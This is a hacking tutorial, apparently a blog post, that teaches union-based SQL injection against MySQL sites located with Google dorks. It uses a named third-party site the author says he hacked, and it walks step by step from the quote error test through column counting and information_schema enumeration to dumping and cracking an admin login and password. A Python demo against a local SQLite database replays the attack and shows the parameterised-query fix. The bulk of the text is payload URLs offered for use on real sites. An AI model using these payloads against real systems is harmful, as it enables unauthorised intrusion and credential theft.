First of all you need to find a website that is vulnerable to SQL injection. To find one we use dorks: Google search queries that match the URL pattern of a particular script, so the results are pages that take an id-style parameter. Just google them and you will find lots of sites; I have posted many dorks before, look at my previous post. Some dorks are given below:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
Google them and you will get some links, but not every link is vulnerable to SQLi.
To check whether a link is vulnerable, put a single quote ' at the end of the URL. The quote breaks the SQL string the script builds from the parameter, and if the script echoes database errors you will see something like this on your screen, which means the site is vulnerable to SQL injection:
Error : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
(No error does not prove the site is safe; a script that hides errors can still be injectable, it is just harder to tell from one request.)
I have chosen a page; the screenshot is given below.
http://www.elmtreeproject.net/event.php?id=11. The site has already been hacked by me, see my Facebook wall.
Now, to check whether this site is vulnerable to SQL injection, I put ' at the end and the link looks like
http://www.elmtreeproject.net/event.php?id=11'
The page shows an SQL error, which means the site is vulnerable to SQLi.
Now we have to find the number of columns the vulnerable query selects, because the UNION SELECT we build later must return exactly the same number of columns as the original query.
To do this, append order by 20-- to the link. In MySQL, ORDER BY with a column position higher than the number of selected columns is an error (Unknown column '20' in 'order clause'), so try different numbers after order by, like 12--, 10-- or 9--, until you find the largest one that loads normally. The -- starts an SQL comment, which cuts off whatever the script appends after our input.
Work it as a bisection: if 20 gives an error, try 15; if 15 loads normally, try 17; if 17 errors again, try 16; if 16 loads normally, the column count is 16, because 16 works and 17 fails. (Putting a minus sign in front of the id, as in id=-11, is not needed for this step; it is done so the real row is not returned, which matters for the UNION step later.)
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
In the chart above the column count is 8: order by 8 loads normally and order by 9 errors.
So now we find the column count for our site.
I put 10 at the end; my link becomes
http://www.elmtreeproject.net/event.php?id=-11 order by 10--
There is an error on the page, so the column count is less than 10. Next:
http://www.elmtreeproject.net/event.php?id=-11 order by 9--
Again an error. Now I put 8-- and this time there is no error, the page loads normally. So the site I am hacking has 8 columns.
Now that we have the column count, we put union select after id=-11, then the numbers 1 up to the column count separated by commas, and -- at the end. The minus sign makes the original WHERE clause match nothing, so the only row the page receives is the one our UNION SELECT supplies.
Our link will look like
http://www.elmtreeproject.net/event.php?id=-11 union select 1,2,3,4,5,6,7,8--
Some of the numbers then show up on the page. Those are the columns the script actually prints, so those are the positions where we can put our own expressions and read the result back.
Now we find the database version. Replace one of the numbers you saw on the screen with @@version. If the version is 5 or later your work is easy, because MySQL 5 introduced information_schema, which we use below to list databases, tables and columns.
I got 3 and 5 as the printed columns, so I replaced 5 with @@version (try all the printed columns if one of them does not show the value). My link after adding @@version:
http://www.elmtreeproject.net/event.php?id=-11 union select 1,2,3,4,@@version,6,7,8--
My database version is 5.0.77.
Now we list the databases. Make the link like this:
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(schema_name),6,7,8 from+information_schema.schemata--
I have replaced @@version with group_concat(schema_name) and at the end added from+information_schema.schemata-- (the + is just a URL-encoded space). group_concat joins all the rows into one comma-separated string, so every schema name the database user is allowed to see comes back in the single printed column. Note that group_concat output is cut at group_concat_max_len, 1024 characters by default, so a very long list will be truncated.
Be careful: everything is done in the printed column, which in our case is 5.
Now we find the name of the current database. Replace group_concat(schema_name) with database() and remove everything after the column list.
My link becomes
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,database(),6,7,8
and you will see the name of the database the script is using. (Leaving the -- on the end does no harm and is safer if the script appends anything after the id.)
Now we list the tables in that database. Replace database() with group_concat(table_name) and at the end add from information_schema.tables where table_schema=database()--.
My link becomes
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--
The table names are displayed; this is where the information is saved.
Look for something like user or admin, where you would expect the site's usernames and passwords to be kept; on our site user is the table where the password is saved. To see the columns of the tables, change the link to
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_schema=database()--
That is, change group_concat(table_name) to group_concat(column_name) and information_schema.tables to information_schema.columns: column names live in the columns view, not the tables view, so asking information_schema.tables for column_name only gives an error. Adding and table_name='user' before the -- limits the list to the one table you care about.
Look for something like pass, password, user_name, or anything else where the password and username could be saved.
On my site I found the columns password and login.
So now we read what is in login and password, which are the username and password of the site. Change the link to
http://www.elmtreeproject.net/event.php?id=-11+union+select 1,2,3,4,group_concat(login,0x3a,password,0x3a),6,7,8 from user--
user is the name of the table we found above; login and password are its columns. 0x3a is the hex for a colon, so each row comes out as login:password:, which keeps the two fields apart when several rows are joined. Use your own table and column names at the end.
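The whole procedure above, from the quote test to reading login:password, as an added example that is not part of the original post and not code from the site. It is a small Python script with an in-memory SQLite database standing in for the site's backend. It assumes the shape of the bug behind event.php (the id is concatenated into the query and database errors are echoed to the page) and uses SQLite stand-ins for the MySQL pieces (sqlite_version() for @@version, sqlite_master for information_schema, || for concatenation). The table and column names event, user, login and password follow the post; the row values are made up. It also shows the fix: the same page with a bound parameter, against which the same payloads return nothing.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the site's backend (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE event(id INTEGER, title TEXT, body TEXT);
        INSERT INTO event VALUES (11, 'Spring fair', 'Details of the fair');
        CREATE TABLE user(id INTEGER, login TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'mark', '6c8c73ee9e41867a2cd358cd15fb5964');
    """)
    return conn


def vulnerable_page(conn, id_param):
    """Assumed shape of the bug behind event.php?id=...: the parameter is pasted
    into the SQL text and database errors are echoed, like the MySQL message above."""
    sql = "SELECT id, title, body FROM event WHERE id=" + id_param
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "Error: " + str(exc)
    # The template prints only title and body; the id column never reaches the page.
    return "".join(f"<h1>{title}</h1><p>{body}</p>" for _, title, body in rows)


def safe_page(conn, id_param):
    """Same page with a bound parameter: the input is data and can never become SQL."""
    rows = conn.execute("SELECT id, title, body FROM event WHERE id=?", (id_param,)).fetchall()
    return "".join(f"<h1>{title}</h1><p>{body}</p>" for _, title, body in rows)


def is_error(page):
    return page.startswith("Error:")


def count_columns(fetch, base_id="11", hi=20):
    """Bisect for the largest ORDER BY position that loads cleanly (the post's 20/15/17/16 walk)."""
    def loads(n):
        return not is_error(fetch(f"{base_id} ORDER BY {n}--"))
    if loads(hi):
        raise ValueError(f"at least {hi} columns; raise hi")
    lo = 1                       # ORDER BY 1 is valid for any SELECT with a column
    while hi - lo > 1:           # invariant: loads(lo) is True, loads(hi) is False
        mid = (lo + hi) // 2
        if loads(mid):
            lo = mid
        else:
            hi = mid
    return lo


def reflected_columns(fetch, ncols, base_id="-11"):
    """UNION a row of distinct markers and see which positions the template prints."""
    markers = [f"'::{i}::'" for i in range(1, ncols + 1)]
    page = fetch(f"{base_id} UNION SELECT {','.join(markers)}--")
    return [i for i in range(1, ncols + 1) if f"::{i}::" in page]


def extract(fetch, ncols, col, expr, from_clause="", base_id="-11"):
    """Put expr into a printed column, wrapped in markers so it can be parsed back out."""
    select = [str(i) for i in range(1, ncols + 1)]
    select[col - 1] = f"'[['||({expr})||']]'"      # SQLite concatenation; MySQL would use concat()
    page = fetch(f"{base_id} UNION SELECT {','.join(select)} {from_clause}--")
    m = re.search(r"\[\[(.*?)\]\]", page, re.S)
    return m.group(1) if m else None


def demo():
    conn = make_db()
    fetch = lambda payload: vulnerable_page(conn, payload)
    result = {"error_on_quote": is_error(fetch("11'"))}      # the ' test
    n = count_columns(fetch)                                 # the ORDER BY step
    result["columns"] = n
    cols = reflected_columns(fetch, n)                       # the 1,2,3,...,n step
    result["reflected"] = cols
    c = cols[0]
    # SQLite stand-ins for @@version, information_schema.tables and the user dump
    result["version"] = extract(fetch, n, c, "sqlite_version()")
    result["tables"] = extract(fetch, n, c, "group_concat(name)",
                               "FROM sqlite_master WHERE type='table'")
    result["creds"] = extract(fetch, n, c, "group_concat(login||':'||password)", "FROM user")
    # The parameterised page: the payload returns no rows and no error, but a real id still works.
    result["safe_blocks"] = safe_page(conn, "-11 UNION SELECT 1,2,3--") == ""
    result["safe_still_works"] = safe_page(conn, "11") != ""
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Running the script walks the same steps the post does by hand: the quote produces an error, ORDER BY bisection finds 3 columns, the marker row shows that columns 2 and 3 are printed, and the three extract calls pull the version, the table list (event,user) and mark:6c8c73ee9e41867a2cd358cd15fb5964 through column 2. The last two keys show that with a bound parameter the injected string is compared as a value and simply matches nothing.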
Wow, we found the username and password. The password is a hash, so we have to turn it back into text.
Our username is mark
and the password hash is 6c8c73ee9e41867a2cd358cd15fb5964.
It is 32 hex characters, the length of an unsalted MD5 digest, which is why an online lookup table can often reverse it. Go to www.passcracking.com and convert it.
After cracking the hash:
pass:SAADI
Now just go to the admin page and enter the username and password, and you will be logged in as admin. Enjoy.
Finding the admin page is not a hard job; I will cover it in another tutorial. Just google the site name with admin page and you will find it. Ours is
Enter the password and username we found...
Yes, we are in the site.
Now do anything you want with this.